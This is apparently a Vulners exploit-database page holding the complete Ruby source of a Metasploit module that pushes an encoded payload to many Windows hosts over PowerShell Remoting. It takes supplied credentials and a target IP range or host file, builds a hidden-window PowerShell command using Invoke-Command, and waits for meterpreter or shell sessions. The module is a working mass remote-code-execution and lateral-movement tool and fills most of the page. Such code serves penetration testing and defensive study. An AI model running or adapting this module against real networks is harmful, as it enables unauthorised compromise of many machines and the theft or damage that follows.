Vulners
Lucene search
Powershell Remoting Remote Command Execution
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | Psexec Via Current User Token | 3 Aug 201200:00 | – | zdt |
| Microsoft Windows Authenticated Powershell Command Execution | 13 Jul 201300:00 | – | zdt |
| Windows Management Instrumentation (WMI) Remote Command Execution | 23 Oct 201300:00 | – | zdt |
 | CVE-1999-0504 | 2 Dec 201000:00 | – | circl |
 | CVE-1999-0504 | 4 Feb 200005:00 | – | cve |
 | CVE-1999-0504 | 4 Feb 200005:00 | – | cvelist |
 | Microsoft Windows - (Authenticated) User Code Execution (Metasploit) | 2 Dec 201000:00 | – | exploitdb |
 | Microsoft Windows Authenticated Logged In Users Enumeration | 4 Dec 201223:32 | – | metasploit |
| PsExec via Current User Token | 7 Mar 201323:53 | – | metasploit |
| Powershell Remoting Remote Command Execution | 4 Dec 201422:06 | – | metasploit |
10
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::Powershell
def initialize(info = {})
super(update_info(info,
'Name' => 'Powershell Remoting Remote Command Execution',
'Description' => %q{
Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
use a HOSTFILE to supply a list of known hostnames.
},
'License' => MSF_LICENSE,
'Author' => [ 'Ben Campbell' ],
'References' =>
[
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Jan 01 1999',
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ],
'Targets' =>
[
[ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
],
'DefaultTarget' => 0
))
register_options([
OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
OptString.new('SMBDomain', [ false, 'The Windows domain to use for authentication' ]),
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
# Move this out of advanced
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ])
])
register_advanced_options(
[
OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
], self.class)
end
def exploit
if !datastore['ExitOnSession'] && !job_id
fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
end
unless datastore['RHOSTS'] || datastore['HOSTFILE']
fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
end
if datastore['SMBUser'] && datastore['SMBPass'].nil?
fail_with(Failure::BadConfig, "Need both username and password set.")
end
if datastore['RHOSTS']
ip_list = "$iplist="
Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
ip_list << "'#{ip}',"
end
# Remove trailing comma...
ip_list = ip_list[0..-2]
ip_list << ";"
end
known_hosts = ""
if datastore['HOSTFILE']
::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
hostname.strip!
known_hosts << "'#{hostname}'," unless hostname.blank?
end
known_hosts = known_hosts[0..-2]
end
command = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
encode_final_payload: true,
remove_comspec: true)
ps = <<EOF
#{generate_credentials}
$ResultList=@(#{known_hosts});
#{ip_list}
foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
EOF
if datastore['SMBUser']
ps << " -Credential $creds"
end
# If the host process terminates too quickly the jobs will die
# before they spawn in a new process.
ps << ";Sleep 20;"
ps.gsub!("\n", "")
command = generate_psh_command_line(
noprofile: true,
windowstyle: 'hidden',
command: ps
)
print_status("Executing command...")
begin
cmd_exec(command)
rescue Rex::TimeoutError
end
stime = Time.now.to_f
loop do
break if session_created? && datastore['ExitOnSession']
break if datastore['ListenerTimeout'].to_i > 0 && (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f)
Rex.sleep(1)
end
print_status("Completed")
end
def generate_credentials(domain = datastore['SMBDomain'], user = datastore['SMBUser'], pass = datastore['SMBPass'])
creds = ""
unless user.nil?
creds = "$pass=ConvertTo-SecureString -string '#{pass}' -asPlainText -force;"\
"$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
if domain.nil?
creds << "'#{user}'"
else
creds << "'#{domain}\\#{user}'"
end
creds << ",$pass;"
end
creds
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Mar 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.39474